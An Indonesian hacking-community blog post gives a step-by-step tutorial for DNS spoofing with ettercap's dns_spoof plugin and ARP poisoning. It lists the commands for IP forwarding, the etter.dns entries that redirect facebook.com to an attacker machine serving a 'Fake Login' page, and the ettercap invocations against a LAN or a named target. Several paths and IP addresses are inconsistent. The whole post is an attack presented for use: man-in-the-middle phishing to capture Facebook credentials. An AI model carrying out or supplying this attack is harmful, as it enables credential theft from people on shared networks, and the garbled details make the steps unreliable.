Alhamdulillah, web Malang Cyber Crew sudah up lagi, jadi semangat pengen nulis Dengan tampilan yang menurut saya keren ‘beudh’.

wkwkwkwk 😀

Oke masuk ke pembahasan. Jadi waktu itu saya ikut kopdar MCC @ STIMATA Malang. Zen Rooney sebagai pemateri mempresentasikan tentang DNS Spoofing.

Waktu kopdar, tool yang digunakan adalah DNS Spoof yang sudah terinstall di Backbox,Backtrack dan Kali linux CMIIW
yang dapat diakses dengan hanya mengetikkan pada terminal [email protected]:~# dns_spoof

Nah, bedanya dengan tutorial ini, saya menggunakan tool yang bernama Ettercap. Dari ettercap ini nantinya saya akan memanggil plugin dns spoof.

Kenapa sih harus pakai ettercap? kan bisa langsung aja gunakan tool Dns Spoof ?

Hehe, biar nambah ilmu dan pengalaman aja 😀

Sebelumnya kita harus tau dulu, apa sih arti dari DNS Spoofing?

DNS Spoofing adalah salah satu metode hacking Man In The Middle Attack (MITM). Hampir sama konsepnya dengan ARP Spoofing, tapi yang membedakan adalah Attacker akan memalsukan alamat IP dari sebuah domain.

DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi.

Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker.
(http://ardy-smart.blogspot.com/2012/07/pengertian-dns-spoofing.html)

Langkah-langkah DNS Spoofing adalah sebagai berikut :

1. Aktifkan ip forward dengan cara :

$ echo 1 > /proc/sys/net/ipv4/ip_forward

Lalu cek, apakah ip forward sudah benar-benar aktif

$ cat /proc/sys/net/ipv4/ip_ipforward

Jika hasilnya bernilai ‘1’ maka ip forward telah aktif, jika ‘0’ maka belum aktif dan harus mengaktifkannya lagi

2. edit file etter.dns
Cari dulu file etter.dns dengan cara :

$locate etter.dns

Kalo di ane, direktorinya ada di /etc/ettercap/etter.dns

lalu edit dengan perintah :

$ nano /etc/ettercap/dns.dns

Cari tulisan ini >> # redirect it to www.linux.org

Lalu dibawah tulisan itu, ada 3 baris website beserta IP yang akan di redirect.

microsoft.com A 192.168.0.101
*.microsoft.com A 192.168.0.101
www.microsoft.com PTR 192.168.0.101 # Wildcards in PTR are not allowed

Arti dari kode diatas adalah, situs microsoft.com akan dialihkan (spoof) ke IP 192.168.0.100

Itulah tujuan dari DNS Spoofing, yaitu mengalihkan website yang kita tentukan ke IP yang juga telah kita tentukan.
code diatas websitenya bisa diganti sesukanya contoh kita akan mengalihkan facebook ke localhost kita yang isinya Fake Login 😀

facebook.com A 192.168.0.101
*.facebook.com A 192.168.0.101
www.facebook.com PTR 192.168.0.101 # Wildcards in PTR are not allowed

Save & Exit

3. Langkah selanjutnya adalah menggunakan tool ettercap untuk melakukan DNS Spoofing. Perintahnya adalah:

$ ettercap -T -q -i wlan0 -P dns_spoof -M arp // //

Perintah di atas akan mengaktifkan ettercap dan kemudian memilih interface Wlan sebagai interface untuk melakukan dns spoofing dan kemudian pada ettercap kita memanggai plugin dns_spoof

Bisa juga dengan menspesifikasikan IP Target terlebih dahulu

Contoh IP Target adalah 192.168.0.111 maka perintahnya

$ ettercap -T -q -i wlan0 -P dns_spoof -M arp /192.168.0.111/ //

Dengan menspesifikasikan IP Target, maka IP yang akan pertama jadi sasaran adalah 192.168.1.111

4. Tinggal tunggu dan duduk manis untuk menunggu apakah Dns Spoofing berhasil.

Jika berhasil maka akan ada pesan kira2 seperti ini :
facebook.com Spoofed to 192.168.0.101

Sukses dah . .

Kalo belum berhasil, dicoba lagi, jangan nyerah. Tapi terkadang memang ada yang tidak bisa di spoof. Pokoknya jangan menyerah dah,

Kalo tutorial di atas masih dirasa kurang jelas, ini saya ada buatkan video tutorial tentang DNS Spoofing